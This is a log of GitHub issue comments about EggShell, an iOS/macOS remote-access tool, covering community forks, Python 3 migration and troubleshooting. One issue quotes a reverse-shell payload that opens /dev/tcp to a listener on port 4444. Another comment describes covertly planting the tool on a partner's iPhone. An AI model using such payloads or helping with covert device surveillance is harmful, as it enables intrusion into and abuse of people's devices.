[2021-03-21 18:02] 0xfffffff0075e2040 commented on #138
I'll be pushing some improvements to [my fork](https://github.com/RPwnage/EggShell) in the next time as I don't think pull requests on this repo will ever get reviewed, you could use mine as a community fork ¯\_(ツ)_/¯

[2021-03-21 23:42] 0xfffffff0075e2040 commented on #119
Still working on macOS Big Sur

[2021-03-21 23:43] 0xfffffff0075e2040 commented on #97
[My community fork](https://github.com/rpwnage/eggshell-community-fork) has been migrated to python3!

[2021-03-21 23:44] 0xfffffff0075e2040 commented on #110
You did not include the openssl library build

[2021-03-22 00:17] 0xfffffff0075e2040 opened #139 "Link to Community Fork"
I've created a actively maintained and updated community fork due to this repostitory being abandoned. Feel free to submit issues and pull requests on the [community fork](https://github.com/rpwnage/eggshell-community-fork).

[2021-03-22 11:05] 0xfffffff0075e2040 commented on #129
[Community fork](https://github.com/rpwnage/EggShell-Community-Fork)

[2021-03-22 16:01] 0xfffffff0075e2040 commented on #117
The "victim" has to allow the executable to use the connected camera device (Webcam, USB-Cam etc)

[2021-03-23 15:39] 0xfffffff0075e2040 commented on #134
I've created a community fork with python3 and iOS 13+ Changes. [Feel free to open issues here](https://github.com/rpwnage/EggShell-Community-Fork)

[2021-03-23 18:11] 0xfffffff0075e2040 commented on #131
Everything is correct on the output you've given. It's just waiting for a "victim" to connect on port 4444

[2021-03-23 18:12] 0xfffffff0075e2040 commented on #88
(Find a way to) execute it on the iOS/macOS Device

[2021-03-23 23:52] 0xfffffff0075e2040 commented on #54
No there isn't

[2021-03-23 23:53] 0xfffffff0075e2040 commented on #127
Could you explain this further?

[2021-03-24 10:07] enty8080 commented on #127
@RPwnage

Latest versions of macOS like Catalina and newer uses ZSH as default shell instead of bash.

If you want to take some ideas, I am also developing some tools to attack iPhoneOS, macOS here: https://github.com/enty8080/membrane

And future of this will be presented at my HatSploit Framework here:
https://github.com/EntySec/HatSploit

[2021-03-24 11:11] 0xfffffff0075e2040 commented on #127
I was just asking because I'll try to make the neccessary migrations in my Community Fork of [EggShell](https://github.com/rpwnage/EggShell-Community-Fork)

[2021-03-24 11:13] enty8080 commented on #127
@RPwnage I know

[2021-03-24 11:15] enty8080 commented on #127
@RPwnage Instead of old esplios you can use my solution ==> https://github.com/enty8080/ac1d

[2021-03-24 11:16] 0xfffffff0075e2040 commented on #127
Is it open for contribution?

[2021-03-24 11:18] enty8080 commented on #127
@RPwnage Yes, you can use it and modify it. But do not forget to give original credits.

[2021-08-26 06:58] hackedXD opened #143 "When i paste bash payload in terminal, doesnt work"
The title basicallly tells the problem but like, i paste the generated payload..
bash &> /dev/tcp/10.0.0.1/4444
10.0.0.1 being the replacement for actuall ip
and my response is
zsh: no such file or directory: /dev/tcp/10.0.0.191/4444
its not working
wut am i doing WRONG!?????

[2021-08-28 23:26] #85 closed

[2021-09-14 23:31] viggou commented on #143
run just `bash` first, it's something with zsh

[2021-10-05 23:38] Hargues opened #144 "Neoneeggplant/Eggshell"

[2022-04-02 21:08] evan797 commented on #144
Does this still work on the current IOS 15 ?

[2022-05-18 00:15] acheong08 commented on #144
No

[2022-07-06 19:07] DarkRavenJ commented on #144
New topic. Sorry this is my first time posting. When one has completed all the testing and research that is necessary, how does the app/program get uninstalled?  Does it have to be removed wuth the same compiler that was used to deploy the app?

[2022-07-07 05:36] acheong08 commented on #144
Depends on how you're deploying the shell. If using bash, it creates a file at /tmp/espl which is deleted on exit

[2022-07-08 17:45] DarkRavenJ commented on #144
Ok. That gives me a direction. Let's try this scenario. Person a has iPhone. Person b is the S.O. Of person a. B has hidden agenda and is trying to discredit a's reputation. The app is deployed with the forethought this would. E a repeated search and rescue mission. Would there be constant channel of sorts that would remain available? Also how would the device for person a know that it was intact

[2022-07-09 02:29] acheong08 commented on #144
First of all, stop daydreaming. Second, this tool creates a reverse shell, meaning that the compromised device attempts to connect back to the attacker rather than the other way around. Unless the IP address used by the attacker is compromised, the backdoor cannot be used by another user. Of course, a reverse shell creates the issue of traceability: The IP address of the attacker is known to the v

[2022-07-09 02:30] acheong08 commented on #144
Keep in mind that this repository has been abandoned and no longer works iPhones

[2022-07-15 15:42] DarkRavenJ commented on #144
Your help and input has been much appreciated. I have to be able to wrap my mind around circumstances prior to posting them to my grey matter storage system. Lol. Have a great day. ~Jenn

[2022-08-17 01:52] avijitpalit opened #145 "Is it support over internet?"
Will it work over internet or only lan network?